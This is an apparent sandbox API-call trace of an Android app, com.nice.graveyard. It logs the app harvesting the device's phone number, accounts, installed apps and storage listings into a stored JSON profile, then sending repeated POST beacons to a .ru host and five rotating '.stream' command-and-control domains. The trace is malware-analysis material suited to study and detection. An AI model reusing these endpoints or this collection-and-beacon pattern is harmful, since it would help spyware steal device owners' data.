D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files/drive_content_do_not_modify]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files/drive_content_do_not_modify]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.vending/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.touchtype.swiftkey]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.touchtype.swiftkey]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.touchtype.swiftkey]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.touchtype.swiftkey]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/.khr]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.youtube]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.youtube/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.youtube/cache/exo]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.googlequicksearchbox]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.googlequicksearchbox/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.googlequicksearchbox/files/pending_blobs]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.googlequicksearchbox/files/download_cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.samsung.installer]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/update.apk]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/111.apk]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/pms_file]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/roms/sfc]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/roms/sfc/sgz3.sfc]
D/S4URC   ( 3801): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3801): [SDK] [android.accounts.AccountManager] [getAccounts]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.pm.ApplicationInfo]
D/S4URC   ( 3801): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3801): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3801): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://0phi9dcwv-ox8owuidyl.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3801): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://0phi9dcwv-ox8owuidyl.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][id] [Value][27000544:61-HiZF5Fsi]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][params] [Value][{"params":{"email":"secaascnsl@gmail.com","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"Test PLMN 1-1","internet_channel":"wifi","apks":["com.touchtype.swiftkey","io.appium.uiautomator2.server","com.android.samsung.installer","samsung.systemservice","com.nice.graveyard"]}}]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3801): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3801): [SDK] [android.accounts.AccountManager] [getAccounts]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][params] [Return][{"params":{"email":"secaascnsl@gmail.com","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"Test PLMN 1-1","internet_channel":"wifi","apks":["com.touchtype.swiftkey","io.appium.uiautomator2.server","com.android.samsung.installer","samsung.systemservice","com.nice.graveyard"]}}]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][params] [Value][{"params":{"email":"secaascnsl@gmail.com","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"Test PLMN 1-1","internet_channel":"wifi","apks":["com.touchtype.swiftkey","io.appium.uiautomator2.server","com.android.samsung.installer","samsung.systemservice","com.nice.graveyard"]}}]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://0phi9dcwv-ox8owuidyl.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3801): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://0phi9dcwv-ox8owuidyl.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][domens] [Value][{"domens":["ams88nb8bbi9d-n662idktiz.stream","ams63isi2hfiz-k4fn2rrn8h.stream","amsszb7ha4t6t-9de939n7bb.stream","amsiz9z6ned29-zhzyn57zke.stream","amsy28dekhyh7-i8nz97h55s.stream"]}]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][period] [Value][400000]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3801): [SDK] [android.accounts.AccountManager] [getAccounts]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3801): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3801): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.android.webview]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][1535744989628]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][ping_time] [Value][1535744869628]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.nice.graveyard-1/base.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/cache]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/cache]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][period] [Return][400000]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][1535744869628]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][ping_time] [Value][1535744995188]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][domens] [Return][{"domens":["ams88nb8bbi9d-n662idktiz.stream","ams63isi2hfiz-k4fn2rrn8h.stream","amsszb7ha4t6t-9de939n7bb.stream","amsiz9z6ned29-zhzyn57zke.stream","amsy28dekhyh7-i8nz97h55s.stream"]}]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [android.accounts.AccountManager] [getAccounts]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.pm.ApplicationInfo]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][params] [Return][{"params":{"email":"secaascnsl@gmail.com","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"Test PLMN 1-1","internet_channel":"wifi","apks":["com.touchtype.swiftkey","io.appium.uiautomator2.server","com.android.samsung.installer","samsung.systemservice","com.nice.graveyard"]}}]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][params] [Value][{"params":{"email":"secaascnsl@gmail.com","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"Test PLMN 1-1","internet_channel":"nowifi","apks":["com.touchtype.swiftkey","io.appium.uiautomator2.server","com.android.samsung.installer","samsung.systemservice","com.nice.graveyard"]}}]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml] [DesFile][/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://ams88nb8bbi9d-n662idktiz.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://ams88nb8bbi9d-n662idktiz.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://ams63isi2hfiz-k4fn2rrn8h.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://ams63isi2hfiz-k4fn2rrn8h.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://amsszb7ha4t6t-9de939n7bb.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://amsszb7ha4t6t-9de939n7bb.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://amsiz9z6ned29-zhzyn57zke.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://amsiz9z6ned29-zhzyn57zke.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://amsy28dekhyh7-i8nz97h55s.stream/apk_main.php?get_hash=7]
